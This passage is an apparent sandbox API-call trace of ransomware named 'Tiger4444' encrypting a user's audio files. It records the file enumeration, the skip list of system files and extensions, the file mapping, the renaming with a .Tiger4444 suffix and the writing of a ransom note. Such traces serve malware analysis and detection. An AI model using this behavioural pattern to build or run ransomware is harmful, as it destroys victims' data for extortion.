dwFlags=0x0, lpMem=0xc89608 | out: hHeap=0xc50000) returned 1 [0046.086] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc720c0 | out: hHeap=0xc50000) returned 1 [0046.086] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0046.087] CloseHandle (hObject=0x2c8) returned 1 [0046.087] CloseHandle (hObject=0x260) returned 1 [0046.092] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\fRm4zP.wav.Tiger4444") returned 68 [0046.092] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\fRm4zP.wav" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\nk_upgc\\frm4zp.wav"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\fRm4zP.wav.Tiger4444" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\nk_upgc\\frm4zp.wav.tiger4444"), dwFlags=0x1) returned 1 [0046.092] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=59904 | out: Addend=0xc6f980) returned 20013152 [0046.092] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4593 [0046.092] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18419720, ftCreationTime.dwHighDateTime=0x1d4cfbc, ftLastAccessTime.dwLowDateTime=0x5cd6e4a0, ftLastAccessTime.dwHighDateTime=0x1d4c92f, ftLastWriteTime.dwLowDateTime=0x5cd6e4a0, ftLastWriteTime.dwHighDateTime=0x1d4c92f, nFileSizeHigh=0x0, nFileSizeLow=0x189ac, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FSplmPyv3.m4a", cAlternateFileName="FSPLMP~1.M4A")) returned 1 [0046.092] lstrcmpiW (lpString1="FSplmPyv3.m4a", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.092] lstrcmpiW (lpString1="FSplmPyv3.m4a", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.092] lstrcmpiW (lpString1="FSplmPyv3.m4a", lpString2="Tiger4444.exe") returned -1 [0046.092] lstrcmpiW (lpString1="FSplmPyv3.m4a", lpString2=".") returned 1 [0046.092] lstrcmpiW (lpString1="FSplmPyv3.m4a", lpString2="..") returned 1 [0046.092] lstrcmpiW (lpString1="FSplmPyv3.m4a", lpString2="windows") returned -1 [0046.092] lstrcmpiW (lpString1="FSplmPyv3.m4a", lpString2="bootmgr") returned 1 [0046.093] lstrcmpiW (lpString1="FSplmPyv3.m4a", lpString2="pagefile.sys") returned -1 [0046.093] lstrcmpiW (lpString1="FSplmPyv3.m4a", lpString2="boot") returned 1 [0046.093] lstrcmpiW (lpString1="FSplmPyv3.m4a", lpString2="ids.txt") returned -1 [0046.093] lstrcmpiW (lpString1="FSplmPyv3.m4a", lpString2="NTUSER.DAT") returned -1 [0046.093] lstrcpyW (in: lpString1=0x30aeb08, lpString2="FSplmPyv3.m4a" | out: lpString1="FSplmPyv3.m4a") returned="FSplmPyv3.m4a" [0046.093] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\FSplmPyv3.m4a", dwFileAttributes=0x0) returned 1 [0046.093] lstrlenW (lpString="FSplmPyv3.m4a") returned 13 [0046.093] lstrlenW (lpString="Tiger4444") returned 9 [0046.093] lstrcmpiW (lpString1="mPyv3.m4a", lpString2="Tiger4444") returned -1 [0046.093] lstrlenW (lpString=".dll") returned 4 [0046.093] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0046.093] lstrlenW (lpString=".lnk") returned 4 [0046.093] lstrcmpiW (lpString1=".m4a", lpString2=".lnk") returned 1 [0046.093] lstrlenW (lpString=".ini") returned 4 [0046.093] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0046.093] lstrlenW (lpString=".sys") returned 4 [0046.093] lstrcmpiW (lpString1=".m4a", lpString2=".sys") returned -1 [0046.093] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\FSplmPyv3.m4a" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\nk_upgc\\fsplmpyv3.m4a"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0046.093] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0046.093] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13754641976) returned 1 [0046.093] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=100780) returned 1 [0046.093] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89c98 [0046.093] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0046.094] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x18cb0, lpName=0x0) returned 0x2c8 [0046.094] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x18cb0) returned 0xbe0000 [0046.096] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0046.096] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75ec8 [0046.096] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0046.096] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75fe0 [0046.096] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0046.096] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75fe0 | out: hHeap=0xc50000) returned 1 [0046.096] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0046.096] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ec8 | out: hHeap=0xc50000) returned 1 [0046.096] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13754907574) returned 1 [0046.096] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89c98 | out: hHeap=0xc50000) returned 1 [0046.096] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0046.096] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0046.097] CloseHandle (hObject=0x2c8) returned 1 [0046.097] CloseHandle (hObject=0x260) returned 1 [0046.101] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\FSplmPyv3.m4a.Tiger4444") returned 71 [0046.101] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\FSplmPyv3.m4a" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\nk_upgc\\fsplmpyv3.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\FSplmPyv3.m4a.Tiger4444" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\nk_upgc\\fsplmpyv3.m4a.tiger4444"), dwFlags=0x1) returned 1 [0046.102] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=100784 | out: Addend=0xc6f980) returned 20073056 [0046.102] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4595 [0046.102] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd4c6a930, ftCreationTime.dwHighDateTime=0x1d4d3a9, ftLastAccessTime.dwLowDateTime=0xa9f88e0, ftLastAccessTime.dwHighDateTime=0x1d4c885, ftLastWriteTime.dwLowDateTime=0xa9f88e0, ftLastWriteTime.dwHighDateTime=0x1d4c885, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PkaVAmyKozGT3xgCy", cAlternateFileName="PKAVAM~1")) returned 1 [0046.102] lstrcmpiW (lpString1="PkaVAmyKozGT3xgCy", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0046.102] lstrcmpiW (lpString1="PkaVAmyKozGT3xgCy", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.102] lstrcmpiW (lpString1="PkaVAmyKozGT3xgCy", lpString2="Tiger4444.exe") returned -1 [0046.102] lstrcmpiW (lpString1="PkaVAmyKozGT3xgCy", lpString2=".") returned 1 [0046.102] lstrcmpiW (lpString1="PkaVAmyKozGT3xgCy", lpString2="..") returned 1 [0046.102] lstrcmpiW (lpString1="PkaVAmyKozGT3xgCy", lpString2="windows") returned -1 [0046.102] lstrcmpiW (lpString1="PkaVAmyKozGT3xgCy", lpString2="bootmgr") returned 1 [0046.102] lstrcmpiW (lpString1="PkaVAmyKozGT3xgCy", lpString2="pagefile.sys") returned 1 [0046.102] lstrcmpiW (lpString1="PkaVAmyKozGT3xgCy", lpString2="boot") returned 1 [0046.102] lstrcmpiW (lpString1="PkaVAmyKozGT3xgCy", lpString2="ids.txt") returned 1 [0046.102] lstrcmpiW (lpString1="PkaVAmyKozGT3xgCy", lpString2="NTUSER.DAT") returned 1 [0046.102] lstrcpyW (in: lpString1=0x30aeb08, lpString2="PkaVAmyKozGT3xgCy" | out: lpString1="PkaVAmyKozGT3xgCy") returned="PkaVAmyKozGT3xgCy" [0046.102] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66520 [0046.102] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x84) returned 0xc78e98 [0046.102] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66528 | out: ListHead=0xc66828, ListEntry=0xc66528) returned 0xc663a8 [0046.102] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe87c9240, ftCreationTime.dwHighDateTime=0x1d4c70c, ftLastAccessTime.dwLowDateTime=0xcc788560, ftLastAccessTime.dwHighDateTime=0x1d4cb5b, ftLastWriteTime.dwLowDateTime=0xcc788560, ftLastWriteTime.dwHighDateTime=0x1d4cb5b, nFileSizeHigh=0x0, nFileSizeLow=0x142df, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YWaVCyXnxBoBbdx.m4a", cAlternateFileName="YWAVCY~1.M4A")) returned 1 [0046.102] lstrcmpiW (lpString1="YWaVCyXnxBoBbdx.m4a", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0046.102] lstrcmpiW (lpString1="YWaVCyXnxBoBbdx.m4a", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.102] lstrcmpiW (lpString1="YWaVCyXnxBoBbdx.m4a", lpString2="Tiger4444.exe") returned 1 [0046.102] lstrcmpiW (lpString1="YWaVCyXnxBoBbdx.m4a", lpString2=".") returned 1 [0046.102] lstrcmpiW (lpString1="YWaVCyXnxBoBbdx.m4a", lpString2="..") returned 1 [0046.102] lstrcmpiW (lpString1="YWaVCyXnxBoBbdx.m4a", lpString2="windows") returned 1 [0046.102] lstrcmpiW (lpString1="YWaVCyXnxBoBbdx.m4a", lpString2="bootmgr") returned 1 [0046.102] lstrcmpiW (lpString1="YWaVCyXnxBoBbdx.m4a", lpString2="pagefile.sys") returned 1 [0046.102] lstrcmpiW (lpString1="YWaVCyXnxBoBbdx.m4a", lpString2="boot") returned 1 [0046.102] lstrcmpiW (lpString1="YWaVCyXnxBoBbdx.m4a", lpString2="ids.txt") returned 1 [0046.102] lstrcmpiW (lpString1="YWaVCyXnxBoBbdx.m4a", lpString2="NTUSER.DAT") returned 1 [0046.102] lstrcpyW (in: lpString1=0x30aeb08, lpString2="YWaVCyXnxBoBbdx.m4a" | out: lpString1="YWaVCyXnxBoBbdx.m4a") returned="YWaVCyXnxBoBbdx.m4a" [0046.102] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\YWaVCyXnxBoBbdx.m4a", dwFileAttributes=0x0) returned 1 [0046.103] lstrlenW (lpString="YWaVCyXnxBoBbdx.m4a") returned 19 [0046.103] lstrlenW (lpString="Tiger4444") returned 9 [0046.103] lstrcmpiW (lpString1="oBbdx.m4a", lpString2="Tiger4444") returned -1 [0046.103] lstrlenW (lpString=".dll") returned 4 [0046.103] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0046.103] lstrlenW (lpString=".lnk") returned 4 [0046.103] lstrcmpiW (lpString1=".m4a", lpString2=".lnk") returned 1 [0046.103] lstrlenW (lpString=".ini") returned 4 [0046.103] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0046.103] lstrlenW (lpString=".sys") returned 4 [0046.103] lstrcmpiW (lpString1=".m4a", lpString2=".sys") returned -1 [0046.103] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\YWaVCyXnxBoBbdx.m4a" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\nk_upgc\\ywavcyxnxbobbdx.m4a"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0046.103] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0046.103] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13755617066) returned 1 [0046.103] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=82655) returned 1 [0046.103] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89ab8 [0046.103] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72148 [0046.103] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x145e0, lpName=0x0) returned 0x2c8 [0046.103] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x145e0) returned 0xbe0000 [0046.105] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0046.105] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75fe0 [0046.105] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0046.105] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0046.105] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0046.106] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0046.106] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0046.106] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75fe0 | out: hHeap=0xc50000) returned 1 [0046.106] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13755884296) returned 1 [0046.106] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ab8 | out: hHeap=0xc50000) returned 1 [0046.106] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72148 | out: hHeap=0xc50000) returned 1 [0046.106] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0046.107] CloseHandle (hObject=0x2c8) returned 1 [0046.107] CloseHandle (hObject=0x260) returned 1 [0046.109] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\YWaVCyXnxBoBbdx.m4a.Tiger4444") returned 77 [0046.109] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\YWaVCyXnxBoBbdx.m4a" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\nk_upgc\\ywavcyxnxbobbdx.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\YWaVCyXnxBoBbdx.m4a.Tiger4444" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\nk_upgc\\ywavcyxnxbobbdx.m4a.tiger4444"), dwFlags=0x1) returned 1 [0046.110] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=82656 | out: Addend=0xc6f980) returned 20173840 [0046.110] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4597 [0046.110] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1b758b0, ftCreationTime.dwHighDateTime=0x1d4cc28, ftLastAccessTime.dwLowDateTime=0x723d1a30, ftLastAccessTime.dwHighDateTime=0x1d4d456, ftLastWriteTime.dwLowDateTime=0x723d1a30, ftLastWriteTime.dwHighDateTime=0x1d4d456, nFileSizeHigh=0x0, nFileSizeLow=0x1094b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_MbUJDIbnNB86DdwXKQn.wav", cAlternateFileName="_MBUJD~1.WAV")) returned 1 [0046.110] lstrcmpiW (lpString1="_MbUJDIbnNB86DdwXKQn.wav", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.110] lstrcmpiW (lpString1="_MbUJDIbnNB86DdwXKQn.wav", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.110] lstrcmpiW (lpString1="_MbUJDIbnNB86DdwXKQn.wav", lpString2="Tiger4444.exe") returned -1 [0046.110] lstrcmpiW (lpString1="_MbUJDIbnNB86DdwXKQn.wav", lpString2=".") returned 1 [0046.110] lstrcmpiW (lpString1="_MbUJDIbnNB86DdwXKQn.wav", lpString2="..") returned 1 [0046.110] lstrcmpiW (lpString1="_MbUJDIbnNB86DdwXKQn.wav", lpString2="windows") returned -1 [0046.110] lstrcmpiW (lpString1="_MbUJDIbnNB86DdwXKQn.wav", lpString2="bootmgr") returned -1 [0046.110] lstrcmpiW (lpString1="_MbUJDIbnNB86DdwXKQn.wav", lpString2="pagefile.sys") returned -1 [0046.110] lstrcmpiW (lpString1="_MbUJDIbnNB86DdwXKQn.wav", lpString2="boot") returned -1 [0046.110] lstrcmpiW (lpString1="_MbUJDIbnNB86DdwXKQn.wav", lpString2="ids.txt") returned -1 [0046.110] lstrcmpiW (lpString1="_MbUJDIbnNB86DdwXKQn.wav", lpString2="NTUSER.DAT") returned -1 [0046.110] lstrcpyW (in: lpString1=0x30aeb08, lpString2="_MbUJDIbnNB86DdwXKQn.wav" | out: lpString1="_MbUJDIbnNB86DdwXKQn.wav") returned="_MbUJDIbnNB86DdwXKQn.wav" [0046.110] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\_MbUJDIbnNB86DdwXKQn.wav", dwFileAttributes=0x0) returned 1 [0046.110] lstrlenW (lpString="_MbUJDIbnNB86DdwXKQn.wav") returned 24 [0046.110] lstrlenW (lpString="Tiger4444") returned 9 [0046.110] lstrcmpiW (lpString1="wXKQn.wav", lpString2="Tiger4444") returned 1 [0046.110] lstrlenW (lpString=".dll") returned 4 [0046.110] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0046.110] lstrlenW (lpString=".lnk") returned 4 [0046.110] lstrcmpiW (lpString1=".wav", lpString2=".lnk") returned 1 [0046.110] lstrlenW (lpString=".ini") returned 4 [0046.111] lstrcmpiW (lpString1=".wav", lpString2=".ini") returned 1 [0046.111] lstrlenW (lpString=".sys") returned 4 [0046.111] lstrcmpiW (lpString1=".wav", lpString2=".sys") returned 1 [0046.111] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\_MbUJDIbnNB86DdwXKQn.wav" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\nk_upgc\\_mbujdibnnb86ddwxkqn.wav"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0046.111] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0046.111] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13756387655) returned 1 [0046.111] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=67915) returned 1 [0046.111] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc897e8 [0046.111] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71d90 [0046.111] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10c50, lpName=0x0) returned 0x2c8 [0046.111] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10c50) returned 0xbe0000 [0046.113] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0046.113] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0046.113] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0046.113] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75fe0 [0046.113] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0046.113] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75fe0 | out: hHeap=0xc50000) returned 1 [0046.113] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0046.113] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0046.113] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13756616140) returned 1 [0046.113] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc897e8 | out: hHeap=0xc50000) returned 1 [0046.113] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71d90 | out: hHeap=0xc50000) returned 1 [0046.113] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0046.114] CloseHandle (hObject=0x2c8) returned 1 [0046.114] CloseHandle (hObject=0x260) returned 1 [0046.118] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\_MbUJDIbnNB86DdwXKQn.wav.Tiger4444") returned 82 [0046.118] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\_MbUJDIbnNB86DdwXKQn.wav" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\nk_upgc\\_mbujdibnnb86ddwxkqn.wav"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\_MbUJDIbnNB86DdwXKQn.wav.Tiger4444" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\nk_upgc\\_mbujdibnnb86ddwxkqn.wav.tiger4444"), dwFlags=0x1) returned 1 [0046.119] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=67920 | out: Addend=0xc6f980) returned 20256496 [0046.119] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4599 [0046.119] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1b758b0, ftCreationTime.dwHighDateTime=0x1d4cc28, ftLastAccessTime.dwLowDateTime=0x723d1a30, ftLastAccessTime.dwHighDateTime=0x1d4d456, ftLastWriteTime.dwLowDateTime=0x723d1a30, ftLastWriteTime.dwHighDateTime=0x1d4d456, nFileSizeHigh=0x0, nFileSizeLow=0x1094b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_MbUJDIbnNB86DdwXKQn.wav", cAlternateFileName="_MBUJD~1.WAV")) returned 0 [0046.119] FindClose (in: hFindFile=0xc73108 | out: hFindFile=0xc73108) returned 1 [0046.119] lstrcpyW (in: lpString1=0x30aeb08, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0046.119] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\music\\huzlktkchcijs8zqd\\nk_upgc\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0046.119] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0046.119] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0046.121] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0046.121] CloseHandle (hObject=0x260) returned 1 [0046.121] CloseHandle (hObject=0x2ac) returned 1 [0046.121] GetCurrentThreadId () returned 0xfa8 [0046.121] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66528 [0046.121] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\PkaVAmyKozGT3xgCy", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\PkaVAmyKozGT3xgCy") returned="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\PkaVAmyKozGT3xgCy" [0046.121] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc78e98 | out: hHeap=0xc50000) returned 1 [0046.121] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66520 | out: hHeap=0xc50000) returned 1 [0046.122] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\PkaVAmyKozGT3xgCy" | out: lpString1="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\PkaVAmyKozGT3xgCy") returned="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\PkaVAmyKozGT3xgCy" [0046.122] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\PkaVAmyKozGT3xgCy", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\PkaVAmyKozGT3xgCy\\") returned="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\PkaVAmyKozGT3xgCy\\" [0046.122] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Music\\HuzlkTkcHCiJS8Zqd\\nK_uPGc\\PkaVAmyKozGT3xgCy\\", lpString2=".BFC0E91B00AE8A0620D3" | out: 